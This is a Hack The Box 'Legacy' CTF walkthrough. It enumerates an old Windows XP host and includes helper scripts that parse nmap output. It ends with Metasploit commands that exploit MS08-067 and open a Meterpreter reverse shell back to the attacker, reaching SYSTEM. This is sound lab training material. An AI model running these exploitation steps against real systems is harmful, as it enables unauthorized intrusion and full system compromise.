Legacy Writeup

10 September 2022 #CTF #HTB #box #easy #linux

legacy info

Enumeration

You already know: it's nmap time:

$ sudo nmap -n -p- -T4 -oN enum/fulltcp.nmap 10.10.10.4
[...]
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
[...]
$ ports=$(awk -F/ '/^[[:digit:]]{1,5}\// {printf "%s,", $1}' enum/fulltcp.nmap)
$ sudo nmap -n -p $ports -sCV -oN enum/scripts-tcp.nmap 10.10.10.4
[...]
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9522a (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-11-12T19:13:12+02:00
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
[...]
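As an added example (not part of the original writeup), here is a small POSIX shell script that automates the two things this scan gives us: the open-port list for the follow-up `-sCV` scan, built only from ports in state `open` and without the trailing comma the awk one-liner above leaves behind, and a one-line-per-finding summary of the SMB host-script results that shape the next steps (signing disabled, SMB2 negotiation failed so SMB1 only, guest session accepted). The scan excerpt it parses is constructed to mirror the output above, and the function names are my own.

```bash
#!/bin/sh
# Added example, not code from the original writeup.
# Parses `nmap -oN` normal output: extracts open TCP ports and flags the
# SMB settings from the host-script block that matter for the attack path.

# Constructed excerpt of a -oN file, mirroring the writeup's scan. The
# closed 3389 line is there only to show the state filter at work.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
Nmap scan report for 10.10.10.4
PORT     STATE  SERVICE
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
EOF

# Open TCP ports as "135,139,445": only state "open" (not closed, filtered
# or open|filtered) and no trailing comma, so the result can be passed
# straight to `nmap -p`.
nmap_open_ports() {
    awk -F'[/ ]+' '
        /^[0-9]+\/tcp/ && $3 == "open" {
            ports = ports (ports == "" ? "" : ",") $1
        }
        END { print ports }
    ' "$1"
}

# One line per SMB host-script finding worth acting on.
smb_posture() {
    awk '
        /message_signing: disabled/ {
            print "signing-disabled: NTLM relay to this host is possible"
        }
        /smb2-time: Protocol negotiation failed/ {
            print "smb1-only: no SMB2 support, consistent with Windows XP"
        }
        /account_used: guest/ {
            print "guest-session: nmap scripts ran over a guest/anonymous session"
        }
    ' "$1"
}

nmap_open_ports "$SAMPLE"
smb_posture "$SAMPLE"
```

On a real engagement point both functions at `enum/fulltcp.nmap` and `enum/scripts-tcp.nmap` respectively; the port list feeds the second scan and the posture lines go straight into the notes.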

RPC

Let's see if we can use RPC (via rpcclient) to get some info, such as usernames:

$ rpcclient -N 10.10.10.4
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

-N specifies we want to use null authentication (no password).

But it looks like we need a valid account for that.

SMB

Let's try to list shares:

$ smbclient -N -L 10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER
$ smbclient -U guest -N -L 10.10.10.4
session setup failed: NT_STATUS_LOGON_FAILURE

Again, looks like we need a valid account in order to list shares.

Our nmap scan revealed that the Windows version is extremely old: Windows XP, released in 2001 and out of all support since April 2014, and the failed SMB2 negotiation above confirms the host only speaks SMBv1. Let's use nmap again, this time to check if the box is vulnerable to some known exploits:

$ sudo nmap --script 'smb-vuln-*' -p 139,445 -oN enum/smb-vuln.nmap 10.10.10.4
[...]
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[...]
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[...]

Wow, we have the luxury to choose between 2 known CVEs. How nice.
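As an added example (not from the writeup), the shell function below reduces `smb-vuln-*` output to one line per check whose State is VULNERABLE, together with the CVE identifiers from its IDs line, so the result can be pasted into searchsploit or a `search cve:` in msfconsole instead of being read off the screen. The excerpt it parses is constructed from the scan above, with two extra non-vulnerable result lines added to show that they are skipped; the function name is mine.

```bash
#!/bin/sh
# Added example, not code from the original writeup.
# Reduces `nmap --script 'smb-vuln-*'` output to "<script> <cve>[,<cve>...]"
# for every check that reported State: VULNERABLE.

# Constructed excerpt of the writeup's smb-vuln scan, plus two made-up
# non-vulnerable lines (ms10-054, ms10-061) that must not be reported.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_    https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
EOF

# A multi-line script result opens with "| smb-vuln-<id>:" and closes on the
# next "|_" line; one-line results ("|_smb-vuln-<id>: false") never open a
# block, so they are ignored.
smb_vulns() {
    awk '
        /^\| smb-vuln-/ {
            sub(/^\| /, ""); sub(/:.*$/, "")
            name = $0; state = ""; cves = ""
        }
        /State: VULNERABLE/ { state = "VULNERABLE" }
        /IDs:/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^CVE:/) {
                    sub(/^CVE:/, "", $i)
                    cves = cves (cves == "" ? "" : ",") $i
                }
        }
        /^\|_/ && name != "" {
            if (state == "VULNERABLE") print name, cves
            name = ""
        }
    ' "$1"
}

smb_vulns "$SAMPLE"
```

Against `enum/smb-vuln.nmap` this prints `smb-vuln-ms17-010 CVE-2017-0143` and `smb-vuln-ms08-067 CVE-2008-4250`, the two findings discussed above.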

Exploitation

Either would work, but MS08-067 dates from 2008, squarely inside Windows XP's support lifetime (SP3 shipped that year), and it is the classic XP exploit: its Metasploit module is ranked "great" and ships with a check. The MS17-010 route on XP would mean the ms17_010_psexec module rather than ms17_010_eternalblue, which does not target XP. So we'll use MS08-067.

Metasploit time:

$ msfconsole
[...]
msf6 > search MS08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[...]
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Key Takeaways